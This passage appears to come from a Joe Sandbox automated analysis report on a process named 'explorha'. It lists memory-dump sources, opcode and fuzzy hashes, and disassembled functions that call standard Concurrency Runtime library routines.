                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: BuffersFlushProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 2982998374-0
                                                                                                      • Opcode ID: 39e28e64aa2bec64aeed2e2213f8df8d03e3a24c794e9d6b8ab4d481b7132957
                                                                                                      • Instruction ID: c9f19b0ab1122dc10c672d3fe5b634be7398c3dc4c68310258818e14822a9808
                                                                                                      • Opcode Fuzzy Hash: 39e28e64aa2bec64aeed2e2213f8df8d03e3a24c794e9d6b8ab4d481b7132957
                                                                                                      • Instruction Fuzzy Hash: D6B09232A264304789152B58BC0499DB728BA44B1130A41A6E805E72288A206D424FE4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0087F436 Relevance: .1, Instructions: 144COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 79ddefa735feea7d94bf25e888cccab6900cbc941264d7186bfc52ca0fcb4588
                                                                                                      • Instruction ID: 14bd9cbd0ef0fd6bff5b81e4d8f6e144906e5b86a9d5c867d7f8f10b3ff5b52e
                                                                                                      • Opcode Fuzzy Hash: 79ddefa735feea7d94bf25e888cccab6900cbc941264d7186bfc52ca0fcb4588
                                                                                                      • Instruction Fuzzy Hash: 47519DB1E056158FDB25CF5AE881BAABBF0FB48310F24C56AD609EB295D378D940CF50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 049F043A Relevance: .1, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2a9fce8fbab03e4ae987efc573ff7ef101b772d0cb633d4636b813efc6f48839
                                                                                                      • Instruction ID: b47f7c16a128bdb18091c8480fa0a50959c7ce593720d546fc1faf901b244698
                                                                                                      • Opcode Fuzzy Hash: 2a9fce8fbab03e4ae987efc573ff7ef101b772d0cb633d4636b813efc6f48839
                                                                                                      • Instruction Fuzzy Hash: BE01F1EB24C0607C711682856E589F72B6EE8C2730332CC7FF546C5413F2895A4FA232
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00893D5E Relevance: 22.7, APIs: 15, Instructions: 231COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00893D70
                                                                                                        • Part of subcall function 00893B6E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00893B91
                                                                                                      • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00893D91
                                                                                                      • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00893D9E
                                                                                                      • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00893DEC
                                                                                                      • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00893E73
                                                                                                      • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00893E86
                                                                                                      • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00893ED3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                      • String ID:
                                                                                                      • API String ID: 2530155754-0
                                                                                                      • Opcode ID: 923d77ecf66b88da390beb9ff1f48e22655cf46727eccdb365e0eb4e60244d54
                                                                                                      • Instruction ID: 3948ec2a8e1d3276f2fcb1f5f8df70fad3298fcbced3af7c0b44118a2934ac50
                                                                                                      • Opcode Fuzzy Hash: 923d77ecf66b88da390beb9ff1f48e22655cf46727eccdb365e0eb4e60244d54
                                                                                                      • Instruction Fuzzy Hash: A9818F35904249ABDF16AF98C955BBE7B72FF55308F080098FC41AB252CB328E15DB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00893FFD Relevance: 16.7, APIs: 11, Instructions: 222COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 0089400F
                                                                                                        • Part of subcall function 00893B6E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00893B91
                                                                                                      • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00894030
                                                                                                      • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0089403D
                                                                                                      • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0089408B
                                                                                                      • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00894133
                                                                                                      • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00894165
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                      • String ID:
                                                                                                      • API String ID: 1256429809-0
                                                                                                      • Opcode ID: 6f75d936c082a49eb98faf2fb6847ad890a4aa0d8cccdfe6b00d233b09b96e3e
                                                                                                      • Instruction ID: b850da07a90678af89022dedda42b2903d02b6491809d1a151675e67a1f34501
                                                                                                      • Opcode Fuzzy Hash: 6f75d936c082a49eb98faf2fb6847ad890a4aa0d8cccdfe6b00d233b09b96e3e
                                                                                                      • Instruction Fuzzy Hash: E5719970900209AFDF15EF98C980EBEBBB6FF95304F085098ED51AB252C7328D56DB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00883EC2 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00883F06
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00883F6F
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00883FA3
                                                                                                        • Part of subcall function 00881E7D: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00881E9D
                                                                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00884023
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0088406B
                                                                                                        • Part of subcall function 00881E52: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00881E6E
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0088407F
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00884090
                                                                                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 008840DD
                                                                                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 0088410E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
